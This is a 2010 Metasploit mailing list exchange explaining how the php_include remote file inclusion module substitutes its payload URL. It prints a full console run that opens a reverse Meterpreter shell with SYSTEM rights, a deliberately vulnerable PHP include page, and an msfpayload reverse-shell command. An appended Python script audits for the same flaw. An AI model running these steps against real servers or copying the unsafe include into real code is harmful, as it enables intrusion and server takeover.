Metasploit mailing list archives
Re: php_include confusion
From: egypt () metasploit com
Date: Mon, 12 Jul 2010 18:01:33 -0600
PHP is no longer configured to be vulnerable to this class of exploits by default. If you want to play with it, you'll need to set allow_url_include to true in your php.ini.

XXpathXX gets replaced with the URL of the payload. There are several ways you could have discovered this yourself. The easiest way is to modify the exploit to print out the request before sending it. Alternatively, you could run a sniffer or just read the code, which may be a good idea anyway since you appear to have some misconceptions about what this exploit does. You don't need to generate the payload and you don't need to host it anywhere else; everything needed to run arbitrary code is contained in the exploit.

The following is a transcript of the exploit working as expected:

msf exploit(php_include) > show options

Module options:

   Name      Current Setting                Required  Description
   ----      ---------------                --------  -----------
   PATH      /                              yes       The base directory to prepend to the URL to try
   PHPRFIDB                                 no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /vuln/test.php?path=XXpathXX   no        The URI to request, with the include parameter changed to XXpathXX
   Proxies                                  no        Use a proxy chain
   RHOST     192.168.99.129                 yes       The target address
   RPORT     80                             yes       The target port
   SRVHOST   192.168.99.1                   yes       The local host to listen on.
   SRVPORT   8080                           yes       The local port to listen on.
   URIPATH   /foo                           no        The URI to use for this exploit (default is random)
   VHOST                                    no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.99.1     yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(php_include) > exploit
[*] Started reverse handler on 192.168.99.1:4444
[*] Using URL: http://192.168.99.1:8080/foo
[*] PHP include server started.
[*] Sending stage (33846 bytes) to 192.168.99.129
[*] Meterpreter session 4 opened (192.168.99.1:4444 -> 192.168.99.129:1415) at Mon Jul 12 17:55:48 -0600 2010

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter >

Hope this helped,
egypt

On Mon, Jul 12, 2010 at 5:07 PM, Jeffs <jeffs () speakeasy net> wrote:
In Metasploit when using the /unix/webapp/php_include the attacker is asked to include a value for PHPURI such as

/slogin_lib.inc.php?slogin_path=XXpathXX

Regarding the XXpathXX value, am I correct to assume this passes through to the Metasploit engine to construct an obfuscated string that is then sent to the vulnerable site, appended to the URL automatically?

All documentation and information on using this exploit suggests that if you are not going to use the PHPRFIDB setting, to leave this as "XXpathXX". However all my experimentation does not send a specific url to the vulnerable site as is demonstrated in several videos on this subject.

I know my rhost and lhost are correct, along with all other settings. The apache server runs php and is accessible. The Metasploit service just hangs at:

[*] PHP include server started.

index_test.php looks like this:

<html>
<body>
<? require $_GET['include'] ?>
</body>
</html>

and include.php.txt was created properly with msfpayload as such.

./msfpayload php/reverse_php LHOST=192.168.1.101 R > /var/www/include.php.txt

Both files are on the web server in the proper directories.

If someone could clarify the XXpathXX value for me that would be greatly appreciated.

Thanks much
jeffs
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
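Added example (not part of the original thread and not Metasploit code): a defender-side audit in Python that ties together the two things this exchange turns on, the allow_url_include setting in php.ini and an include statement fed directly from a request parameter, as in the test page quoted above. The function names and the sample php.ini fragment are constructed for illustration.

```python
import re

# Constructed sample inputs for the demonstration (not taken from the thread).
SAMPLE_INI = """\
; constructed php.ini fragment
allow_url_fopen = On
allow_url_include = On   ; the non-default setting the reply mentions
"""
SAMPLE_PHP = """\
<html> <body>
<? require $_GET['include'] ?>
<?php include 'header.php'; ?>
</body> </html>
"""

TRUTHY = {"1", "on", "true", "yes"}
# include/require (and *_once) whose argument mentions a request superglobal.
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\b[^;?]*\$_(?:GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE)

def ini_flag(ini_text, key, default):
    """Effective boolean for `key`; a later assignment overrides an earlier one."""
    value = default
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()          # strip ini comments
        m = re.match(r"([\w.]+)\s*=\s*(.*)$", line)
        if m and m.group(1).lower() == key:
            value = m.group(2).strip().strip("\"'").lower() in TRUTHY
    return value

def tainted_includes(php_source):
    """(line number, text) of include statements fed directly by request data."""
    return [(n, text.strip())
            for n, text in enumerate(php_source.splitlines(), 1)
            if INCLUDE_RE.search(text)]

def assess(ini_text, php_source):
    """Combine both checks into one finding."""
    hits = tainted_includes(php_source)
    # URL includes need allow_url_include AND allow_url_fopen (PHP defaults: Off / On).
    remote = (ini_flag(ini_text, "allow_url_include", False)
              and ini_flag(ini_text, "allow_url_fopen", True))
    if not hits:
        risk = "none found"
    else:
        risk = "remote file inclusion" if remote else "local file inclusion only"
    return {"url_includes_enabled": remote, "hits": hits, "risk": risk}

if __name__ == "__main__":
    print(assess(SAMPLE_INI, SAMPLE_PHP))
```

With allow_url_include left at its default the same include is still reported, because a request-controlled path remains a local file inclusion problem; the durable fix is to map the parameter onto a fixed allowlist of files rather than rely on the ini setting.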